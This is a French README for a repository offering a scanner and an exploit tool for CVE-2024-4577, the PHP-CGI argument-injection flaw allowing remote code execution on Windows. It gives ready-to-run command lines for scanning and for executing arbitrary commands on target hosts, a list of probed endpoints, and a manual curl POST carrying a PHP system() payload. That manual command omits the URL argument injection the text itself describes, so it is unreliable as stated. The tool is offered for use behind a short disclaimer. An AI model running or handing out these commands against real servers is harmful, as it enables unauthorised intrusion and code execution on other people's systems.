
Scanner et outil d'exploitation pour CVE-2024-4577, une vulnérabilité d'injection d'arguments CGI PHP permettant l'exécution de code à distance sur les systèmes Windows. Inclut des modules de détection et d'exécution de commandes.
CVE-2024-4577 est une vulnérabilité critique d'injection d'arguments CGI PHP qui affecte les systèmes Windows exécutant PHP en mode CGI. Cette faille permet à des attaquants distants d'injecter des arguments dans la ligne de commande de PHP via des URL spécialement conçues, conduisant à une exécution de code à distance (RCE).
Ce dépôt contient :
CVE-2024-4577.py : un scanner pour détecter les cibles vulnérables.exploit.py : un outil d'exploitation qui envoie du code PHP et exécute des commandes système sur le serveur vulnérable.⚠️ AVERTISSEMENT
Ce projet est destiné uniquement à des fins éducatives et à des tests autorisés. Toute utilisation abusive de ce code n'engage pas la responsabilité de l'auteur. Utilisez-le de manière responsable et uniquement dans des environnements qui vous appartiennent ou pour lesquels vous disposez d'une autorisation explicite de test.
requestsInstaller les dépendances :
pip install -r requirements.txt
Détecter si une cible est vulnérable à CVE-2024-4577 :
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
Le scanner et l'outil d'exploitation testent les points de terminaison CGI courants comme :
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
La charge utile contourne cgi.force_redirect et préfixe du PHP malveillant via php://input.
Exécuter des commandes système arbitraires sur une cible vulnérable :
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

Vous pouvez également exploiter la vulnérabilité manuellement avec curl
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
Cette commande envoie une charge utile PHP qui exécute uname -a sur le serveur et renvoie la sortie.

Ce code est publié sous la licence MIT. Voir LICENSE pour plus d'informations.